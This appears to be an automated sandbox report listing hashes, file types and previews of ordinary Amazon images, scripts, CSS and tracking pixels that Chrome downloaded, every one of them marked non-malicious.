                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6950)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):289315
                                                                                                                                                                                                        Entropy (8bit):5.497169430784317
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:1M+1lrOE3MR9lQX4ZVqPnvqy4LdUA1KSG4a1pqjBQw11KsD5XTn5gCrPYtK5gDJy:1M+1lrOE30QX4ZVqPnvqy4LdUA1KSG4X
                                                                                                                                                                                                        MD5:FCC677145B02A91184B82B9B582C618D
                                                                                                                                                                                                        SHA1:58E65BFE5A9137F4E544BEDECAF202F625139BB7
                                                                                                                                                                                                        SHA-256:9515D7B4208E84B9CBA3039A3BFBF11E1454FD07737B830990D015CD0BCA8910
                                                                                                                                                                                                        SHA-512:6D38D4148EB0F2F8FCEAA0D74F24FD4DF61811A54B2C339CDE44AF60471B115BE142FED035E148786F9E5A8F2BF193EDB0FA053FAADF4EC14CC01BF020700836
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:////////////////////////////////////////////.;(function (packageFunction) {. /* istanbul ignore next */. var p = window.AmazonUIPageJS || window.P;. /* istanbul ignore next */. var attribute = p._namespace || p.attributeErrors;. /* istanbul ignore next */. var namespacedP = attribute ? attribute("FWCIMAssets", "") : p;.. /* istanbul ignore next */. if (namespacedP.guardFatal) {. namespacedP.guardFatal(packageFunction)(namespacedP, window);. } else {. namespacedP.execute(function () {. packageFunction(namespacedP, window);. });. }.}(function(P, window, undefined){.// BEGIN ASSET FWCIMAssets - 4.0./////////////////////////.// BEGIN FILE src/js/fwcim.js./////////////////////////./*...Full source (including license, if applicable) included below..*/./******/ (function(modules) { // webpackBootstrap./******/ .// The module cache./******/ .var installedModules = {};./******/./******/ .// The require function./******/ .function __webpack_require__(moduleId) {./******/.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11121
                                                                                                                                                                                                        Entropy (8bit):7.849936307480341
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:b1qx3eNiXPcp+JctrO3xItyuShERcKAqNlRk2notr7QTRr252B:o3XUgJWy32ShEerinotreRC5o
                                                                                                                                                                                                        MD5:8CCD6151C8CB5424DCE27FE2762DDC8D
                                                                                                                                                                                                        SHA1:BCF811A100E5FB850711DC2418559452169A41FD
                                                                                                                                                                                                        SHA-256:BB67103CCAD7F8B284383C20267F6C5555BB262992765964492C9B91196FBFC6
                                                                                                                                                                                                        SHA-512:3CA2322860A099D60E092A46198C769AA75E66D4ABD8AC651F4B766A8652D56002F028CB81AB1CDE5AA7FC555466A1259EDEE187DA5E7B5E37A464201E032C3F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4................................................................................................1..(.3..]...fZ...n....................s.....m=..n1k..35|^.......(r...................5..9..k.).(..X%..0.,"...ex.B.......................8a.K.%.....e..Vn.....X;:.Xb......{...........[..i..+.o.$.............4...z...z.Q.D.Q..Rke..y........3.Q..i...g.:gM.......e|...x.S;..q...H.............4..p..4....3.k....f...c.x.+.l.9uk...v...;...I..=.dQvwV'..EA.w.>yWRw.1y.V.DX.+.i.D.................7.ir.Bg.....3n...]...x..^O...........2..oA...c4..ju..C...S.K................w.^.y..K...;..*.>..=..F..XB.R......#....5...Oz.......*..}.&.'..C.n.\..............~.y..O..L.<...q...r..a..-.w).K=.{..`....V*..#.%'.;_.x./?e...N...P.............k....-..;.^v ..Yb.....K,....~b<..M..x.#.l......................!B.4:c..z8
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 226x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7638
                                                                                                                                                                                                        Entropy (8bit):7.894141029119417
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TApPGYqQwCfrE7QwiUsL5oG7HMQXFcVmESTL0Hiv9WdhITTv7Qh2PbkTH7QfEeCM:EoYnzE7QwbdoHrF5hTUiv9WkTwQMHfxY
                                                                                                                                                                                                        MD5:8685B97B3710F3462A9FEA1E4EBEFB8F
                                                                                                                                                                                                        SHA1:5D419D445E320F04C48E4AC31775CE30FD77C7F1
                                                                                                                                                                                                        SHA-256:642C5DA6BEFFDE57ECEC1919FD2C805B2A09797CFA3CCCD01E5891534F3B4522
                                                                                                                                                                                                        SHA-512:824E400478606117BFE8794FE2DBC28A66CD8F91F19FFCECE38755107F97DBA936220F42E98A104F4A2CA6D164EA19189C4F448ACE0A5C0E5335C60B011C7315
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3.........................................................................T.rl..w.VA.".......(Z..]..lt.....\9...0i.>..,.<G...v........)s.../Uk...P..'....D.[(;.$M.......D....g..R.U...<I.D.i. w.'J.....v.*#.U&....e.).....c .+..}d.#l.fA.`..w...z....=u..W....i.N.]..Z..,.E.R.N_.....Il...Y:)........ ....}.aAcTN...M.[.Rq.XU.....A8...a7t,.......-.....n.&.....)3...;/..\....V...^.....U...@....E...._I...z....Z.e..6..+...G..b.V..V$n.....C....k....Uo..x..~.L...&.|.).].....<.&.......8......y....c....k........S\.:...W.....z.}~.U.z....Y...#Ia..v...9.\jT.rm./yE.....r.}........=.............:}./.Zu.[......N.gc...uw.y?]f..wt..*..6......g{.>....E....5....c..A.Xn......+.........................!01A. ".2BQ@Ra#3.............h.S.I>..T.n.....t.....%.....K....c...8..[&].n7....^.yxo..'...."..G....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 124x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):12497
                                                                                                                                                                                                        Entropy (8bit):7.9661102466348845
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:l5qGxqIHYkDzIg01JWy3eP3ECkZAvfBzh40791E:DqGxVHYknaHWOeP0Bmb4s91E
                                                                                                                                                                                                        MD5:6B43472584469448EEA61536D143CBA4
                                                                                                                                                                                                        SHA1:806E0BCBCF3937E07C87C611FC5A9DAC696067D5
                                                                                                                                                                                                        SHA-256:6C6C2674F80D79CD0FCBD617E8F098FA6A53DC9D4423330297213044738FF5B5
                                                                                                                                                                                                        SHA-512:4DDA60BBB5690627A1C9EDF9865717CE4C6484B728421F4A4529E811D530FE37801C396261262A35B6385D94573C88918F26849995A65ACA8B9BD642293915FC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/81VrW5EM1NL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........|.."..............................................................!..1"A..2Q#Baq3..RT.....$Cr....bc.....6st....................................................!1.."AQaq...2...BR.#$3...................?..._.v.....t.~.S...FDR. LE..2o,u..u.g...s6.?.[.....T.......A\v.......T..TFN...x..a., .............&..;C.08...M..[...7.3i.d.i..v..y.Ve/.|......P...N.O..W.$H..JI..c&...e...T..F.<.J...p.......M.:..Y.KN.o..{<6=}*..L.^..6.....&..0$|.pG......E..Q.d.l..k.....L9a....A.....#Y.eX.8...|.!\nA....$...i....e.~.'...@. ............?......j.2.IL...w.|$..H.$...f. .F$.t.V..{...x>..~..A..d8j....f.....&.`.kZ.....{...[.8..x...}~..~C..'.{.|...........h..............y.g.o.Oo.4tX.......b...Dk................*E.L........0T..L.[.g..&..*....y....\...?...}.M..f.H..'..........&.$.....&....U...K.....?c.0n...&..6$q...><q.._{..M/.X'..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5203
                                                                                                                                                                                                        Entropy (8bit):7.836188463655531
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:xyp717Sw2bfkfioZ8v6pYC/gvnDKRWsGilV36SaQej62arQiGibKp5Lo:xyff2CeC/gvnDKRrnZMarQsbK7M
                                                                                                                                                                                                        MD5:E17A9C392B377C4FD7B7F1DEEB758782
                                                                                                                                                                                                        SHA1:DF4DD289DDA661B7124F97416101DC916EE16356
                                                                                                                                                                                                        SHA-256:9FAC05FCF7ED3F20826F4514200E2B15082560D018D596C80A49A7CD19A4EC7F
                                                                                                                                                                                                        SHA-512:6EEF9C7F661A9EAE1583CC95F7231722E215A2EE35A981972E0E53E29D226C5221EE1FE2DCFD82EFFC4BF92F6516C3CB200A46007E23908B4AF7D0DD136D7BF5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................t...."..........9.........................................................................n.......==@.....<19....+i......7....nl..#~^...n;....kp..z........tt|.e*p....Y..v.........;.G_..y.|...D.......9q.%.H..Mo.-.o......e...,..06.P..o...m...^D.......c.4..E...>...b|y..y...9.UOm.x.FJ.....[.\m9\mV....b...*....>..f..._I..+.E...aZ..{.9=N.....if......l.a+=>.!..._.....".\..a.&../J.z:.<...................Z.............................1..!%5AU..$&04EQaq..F....6Wef...."'DGPRTv.....27@dtu...............?....u.\.e........q......e..I...../.K@.1..6m...X.S...$.. .)........\..m.?.g..rOj.T...wmFUY....'..OiS...Wr.t-....wrT._....]....i.W..w.6K.@Q..L.:c[h.)s..Z..Z9....4..lQp_bL...,@.wUC.H8......r.. .M%..?..,._.:(.d..3...Fq......K ....C.54&..!.....=@....T../L/".I3K.k..!C.k*.M.....{_.....]..Hr.g[..... 5.eh.]..f.....y
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:0RPFFN4XC9JAK0QN8ZQ4$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D0RPFFN4XC9JAK0QN8ZQ4%26ic%3D2%26m%3D1%26sc%3Dcsa%3Asi%26si%3D417%26pc%3D5151%26at%3D5151%26t%3D1723729121680%26pty%3DFullPageAuthentication%26spty%3Dclaim%26pti%3Dundefined%26tid%3D0RPFFN4XC9JAK0QN8ZQ4%26aftb%3D1%26lob%3D1:5151
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3419)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3727
                                                                                                                                                                                                        Entropy (8bit):4.799019202515734
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:YfNHMdNpNc6zu9CqbDKWmIl6dO/5C/FVqjweIdhPLZ1:yKo6zus9W8WCvZeML3
                                                                                                                                                                                                        MD5:A5F0396591D56626C9C483D1643BAC11
                                                                                                                                                                                                        SHA1:4803930B3EF9AEFDEFB00BA97DFF2235F905AF03
                                                                                                                                                                                                        SHA-256:4B74E18F9FDEADD5BBC52F28B71FD36029F5674F0800C6449F0AEF8C1A953C72
                                                                                                                                                                                                        SHA-512:BFA0E577FAB6E280B62D870E55B9493814DA9CB8432F0D1BC8124DED10FC5CA1AE0236FF162E4BB81F5C99F64274476C20F54DF5868FD038EC981FA4BCD6224A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/01jGK8CGXTL._RC%7C11mqgJVSK9L.css_.css?AUIClients/ALMCartActionAssets
                                                                                                                                                                                                        Preview:#lts-ingress-container{left:0;right:0;bottom:0;padding:4px;display:none;position:fixed;z-index:99;transition-property:bottom,height,min-height,margin-bottom;transition-duration:.5s}#lts-ingress-container-offset{transition-property:height,margin-bottom;transition-duration:.5s}./* ******** */..a-button.a-button-primary.primary-fresh-btn-flat,.a-button.primary-fresh-btn-flat{background:#b5d25e}.a-button.a-button-primary.primary-fresh-btn-flat.a-button-focus,.a-button.a-button-primary.primary-fresh-btn-flat:focus,.a-button.primary-fresh-btn-flat.a-button-focus,.a-button.primary-fresh-btn-flat:focus{box-shadow:0 0 3px 2px rgba(111,160,13,.5)}.a-button.a-button-primary.primary-fresh-btn-flat.a-button-focus:after,.a-button.a-button-primary.primary-fresh-btn-flat.a-button-primary:after,.a-button.a-button-primary.primary-fresh-btn-flat.a-button-primary:focus,.a-button.a-button-primary.primary-fresh-btn-flat:after,.a-button.primary-fresh-btn-flat.a-button-focus:after,.a-button.primary-fresh-btn-
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 126x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9172
                                                                                                                                                                                                        Entropy (8bit):7.957721765172471
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:QiujN9VTdQMGzkjVd8c2J6w2lqXNdFUPGxKOiu/a2gYyLlPQJGAb:uVTdQzz01PlqFUOxBiu/mKp
                                                                                                                                                                                                        MD5:FB8D03917023C8FE0E54BC8B90668D30
                                                                                                                                                                                                        SHA1:9BE7460E2579583D9B4048D9F1C08B590687E0DB
                                                                                                                                                                                                        SHA-256:6994C683C28B052B96CE08D6012C6888B39A62D4697B19577333C8F5810B4D5E
                                                                                                                                                                                                        SHA-512:42E314CBAEEE2B527A751878BA0282617A6F598325D3798B8AC094044C1E2AB7D010C1C8BC5639723A04EC30C12BF296F8D22C9BAAC91837138C52CE82289698
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........~.."...............................................................!.."1A.2Qa.#..BRbq..$r..3S...c.%6u...................................................!1A."2Qa.q......B....b.............?...4h..>(.ZN...q.I$....cP_.2c4Ds.....&.%.%.GWd..y.gA..#.c`...D.=V...iC...G""....T#.ss.)'.T.H%....K...)R8`.......G}w.s...c{.9N....J.g.nh...g...a...-.X>(n...Z..+IIE^.......mP=3...R....Q."....B.....bU.].v........K4.-..^c_%....+...AoG$#fM.t..gL.|W[.P.k.`R-...V.2....p....vs.k.......A.2..H....~.+..Y...r@7gS.....M.eV......d^D......8#.x..i;{L../..^...Q..)Y...U...Vx6..Ha/./.OI:..."Kd^..V.uv.n......*9.!.N...Y.v.....p.`.jY+.y..E..W.5I......7...O..y).jG..O..r...Y.e?..U.i5........B%..x..?..?R..Kz9*.~..%}..!,{X$l.={...?..x,...X. vl.......:......E.8 ..w.W..0D.<..P8.O.#..m.......US.G.....c...*.6@.Q.9......W..~......F.t.z.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):29858
                                                                                                                                                                                                        Entropy (8bit):5.4055256020117985
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:sXZJOFGP9EfbTopAPALrqaBFb2OLxKHDfxxYV:sqIPOzcp7PqajxKHD0
                                                                                                                                                                                                        MD5:BD6B1572C9B244A3ED08E30DFBAFCABB
                                                                                                                                                                                                        SHA1:257F8CDEDF39D1CAEAACCC05B699498B1B27AD8C
                                                                                                                                                                                                        SHA-256:9F2C34035637AFD00F146B09D7199723A6D8FD99D874627B798E50461D1E74C6
                                                                                                                                                                                                        SHA-512:290E550AD4A191B1FF2018C2F1CDB9CB233E42A85DB28188B5813909A94FF0AE102E600FFFC6D17B6071BEB09482605EB1F35D117B4CC65D2430DB68CF8F2A70
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:{"html":"\u003cdiv class\u003d\"rhf-border\"\u003e\u003cdiv id\u003d\"rhf-shoveler\"\u003e\u003c/div\u003e\u003cdiv class\u003d\"celwidget pd_rd_w-tEp9O content-id-amzn1.sym.cb2e421d-130c-4154-89f5-508ab5cbe603 pf_rd_p-cb2e421d-130c-4154-89f5-508ab5cbe603 pf_rd_r-F7NN0D8HF6S7N30FBG0Y pd_rd_wg-haFdA pd_rd_r-0b88c363-7cc6-4f2b-90bf-54ab2572af6a c-f\" cel_widget_id\u003d\"p13n-rvi_desktop-rvi_0\" data-csa-op-log-render\u003d\"\" data-csa-c-content-id\u003d\"amzn1.sym.cb2e421d-130c-4154-89f5-508ab5cbe603\" data-csa-c-slot-id\u003d\"desktop-rvi-1\" data-csa-c-type\u003d\"widget\" data-csa-c-painter\u003d\"p13n-rvi-cards\"\u003e\u003cscript\u003eif(window.mix_csa){window.mix_csa(\u0027[cel_widget_id\u003d\"p13n-rvi_desktop-rvi_0\"]\u0027, \u0027#CardInstancekCrwmLgJszzGL14Bb3IfTw\u0027)(\u0027mark\u0027, \u0027bb\u0027)}\u003c/script\u003e\n\u003cscript\u003eif(window.uet){window.uet(\u0027bb\u0027,\u0027p13n-rvi_desktop-rvi_0\u0027,{wb: 1})}\u003c/script\u003e\n\u003cstyle\u003e.p13n-sc-rvi
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 58x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2639
                                                                                                                                                                                                        Entropy (8bit):7.8311148488210485
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0rKTIQqkP5OeyWsOOiQ5LI/Mu6QcIfU2AI9agCjaW6JHqcsMvp98FMOUnEqm:T9MEROe3i5L4EO1AIjP3Xv38FMO6Tm
                                                                                                                                                                                                        MD5:0EBE8619F0A09E726B452AF5C3C8346E
                                                                                                                                                                                                        SHA1:91B6E4AC51834C8FCA836B54A6EEE883FCF86EE8
                                                                                                                                                                                                        SHA-256:6DC53A06730D9B7B0D4B1B70B59F267A028F1491A4E1F3305387B97532AE6127
                                                                                                                                                                                                        SHA-512:81D8613B63717D6B2F52E95BD1BA4C5EA96C4304CE2527912BB09A821CA73792E9854DD17F36E7ECF92E5906FFF33CA1AE9F18E94E1EC8BBD93D9382339AF8EE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........:.."..................................................................!5AQ.12at."bqu.....$%Rds...3Br..#4Se.....................................................?......@..I...)k..Nt..C..I.... 7.IUo.cA.q...]Ki. Cm.....\.GXP...N.A;c.......&_.e...hv.......B......v=..K1.&.j...R..... ....H....b..... .(-8.Z..k.}...m..{...X.w..W..J.ai..a.Ka...B.Q...GSgc.z..@.].m....^.A..\.`.^.......+".3 .PX...<...........g9....W.w>.y...P...V..U. n...^.W>%..>;.*.b....Gy.S.........#..K:..t(o6.1Y..|~@j...=l>.R.YM..RV[k.'.@p..DYOq(.ii.s.X...I....tTp..u9r2...g.U1._..l.<t....._.n....Y1....n..59K.Ov ....@W.ON.S...q..FV...dx......(....&.^...}<......B....;..u...?W..;..5.[.N.?[.r.;..d.>....~...v.{.Eg'.om...`..K.E ....(n.0?...1..l.X.PgA.=.m..+..V.sorf.s..*9P....`d.5+.....o..F.';..._.i.K.Nv<../.).P.QE.>:7...j.L].vc..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (48840)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):48888
                                                                                                                                                                                                        Entropy (8bit):5.316989310603465
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:1t0pkZtsaOoGHKsN3+xmxbQGdDYOeSYNkBc7J1VQzqr+JkqR6VhkPlN8Opgydi20:1t0ODIN/EOgJ1VQHZR6VO9N8OKydnpEj
                                                                                                                                                                                                        MD5:54586B09CF42FDBC1BC3F8D144A9C9CE
                                                                                                                                                                                                        SHA1:8792BBE8179A6965653EF878554BCF90C3807A3B
                                                                                                                                                                                                        SHA-256:A67E8235A7759CE78E2B5D3F145CFB07665F37F1257D1C8B80EB0136E1DD7784
                                                                                                                                                                                                        SHA-512:75F28B09EF56BBCCA53E66963F6DF228E284A2604A0692939838F0989A51B14DB0C49B1EA92E306B43DCD2AAD83E5ACD0CF427973C5F20074FEDCBBF0F564A64
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(()=>{function e(e){return e&&e.__esModule?e.default:e}var t=function(e){return e.replace(/_/g,":")},i=/(\/b|\/s|\/l).*(node=)(\d{1,12})/,n=new Map,a=function(){if(!n.has(window.location.href)){var e=i.exec(window.location.href),t=e&&e[3]?e[3]:null;n.set(window.location.href,t)}return n.get(window.location.href)},o=function(e){var t=a();if(!e||!t)return null;var i=e.split(":");return i.splice(i.length-1,0,t),i.join(":")},s=function(e){var t=a();return t?"".concat(e,":").concat(t):null},r={wb:"ues",bb:"uet",af:"uet",cf:"uet",be:"uet",ld:"uex"},d=function(e){var i,n,a=e.latencyEvent,r=e.scope,d=e.placement,p=e.timestamp;l(a)&&(c(a,m(r),d.id,p),c(a,m(r),t(d.name),p),c(a,m(r),null!==(i=o(d.name))&&void 0!==i?i:void 0,p),c(a,m(r),null!==(n=s(d.id))&&void 0!==n?n:void 0,p))},l=function(e){return"function"==typeof window[r[e]]},c=function(e,t,i,n){void 0===n&&(n=new Date);var a=r[e];i&&"function"==typeof window[a]&&window[a](e,t+i,{wb:1},n)},m=function(e){return"adplacements:"+p(e)},p=functio
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):8047
                                                                                                                                                                                                        Entropy (8bit):7.668638568832589
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:hoAzuI7k7qxL8NmlUPacaMLnfd+iIz4qz3yGgFr0imEyR2rDwgkRo:FiI7k7xszMLdfIz4qa5yR5Ro
                                                                                                                                                                                                        MD5:1CAF67F98316B0A794F348C973E28E9F
                                                                                                                                                                                                        SHA1:E41A3FD4731CAA6CDE101F4EC5DE83A6E614C7E0
                                                                                                                                                                                                        SHA-256:9184BAFF81B523FCCE9941FD796559E0A347D8921C70C5A19DE70B5E98992E3C
                                                                                                                                                                                                        SHA-512:73782148A5721B1AE2AC59ED3D5ACC091EC6A7D37B01C7BDB56922198C1AA5C0BC955C7985B53CB7C299A7F45F2DEC4FF1E762A6A103B505623B6917D1E38AD6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/31OXYlKv9gL._SR480,440_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................`...............................Q*.....................9/..".GU.)=.....=..j~.a..7.K...s...o......................f(.E].Y....v..2{...Z.I...? ...................j{^..r.Tf.Rn..Q.............................7E.........................m..U&."...8:.......................pQ..Q/9!.....................Wk.MH....}@......................^.y.M.............................E..5........................?..Y..........................\.X......................6.8...z.f@....................*M......[t......................e.mx.\.t...Y....................W. ...n.,..?....+0...................k[...T.$RI.>.'M.V`....................eh.....^.C..4..s.......$M.#./.md................@..}..6......G.,.2...........w.5..(...X.......................Ct.a..y.=.Z.z..i;.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5643
                                                                                                                                                                                                        Entropy (8bit):7.864358643933752
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:72+xCzZeYanEyL8iJJIBIkGuqP5RzZwEnKpetcpXReNjK3GFt36A64NZJuum4:7BxCYY6RJI6u05TznKUtnNOW7qGs4
                                                                                                                                                                                                        MD5:1B495C1094AA339C163BE7E7F972372E
                                                                                                                                                                                                        SHA1:C50629D2B9A4A520AA0DAA96FBFB882E50F11497
                                                                                                                                                                                                        SHA-256:BB6ED509542D9A6EDE5BF7B1BADDF3E203698283E836F2819ED1108AFF750989
                                                                                                                                                                                                        SHA-512:671683DFD700F7A506562FD99014A42BAE189F656236DBAFDD70E0229CA8C85829078141CE10D9727DFC76CAC01903650A065286069900D62F0B039021D5E03C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................t...."..........9.........................................................................7............~....WT{eW..N1...E.}..H.P.........=..J......0...i........}..T....P1........a.5......."t.`.Nr..z.v......y...Z(.......).]..$.l.Q"...v....+y...5.`6(.......tj~.S...y.+...]3E....O.b-...D..q.G...2`m.J.u..:f...;..:....==._....u.f...j..k.^..."2....UXf@.SG2^.Qg.. .....].%t.&nG`.......p...'...y.@..-.K....*......V....~.}i.................R..........................!1A....Qa...%045q......"$6D#&RTUe.2BPbu... (@EFdv.............?.....0.[.v.....$\\_..v......L......u.}..v.g.)UH..s...9..?k.f.d52..i.H.s$......,.n|.QH....N........U.../*..8JU.N.......:._.ak8.."P9T........T..;..f..*.4.LY(......p.....[M;pk...+..jBp.#v.._.$.G..K....U.D......G.JhE'.._h|q@.;TRz.3`.5.....'xI.."......O...H........n..V.V..>.".u.....CI..}..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
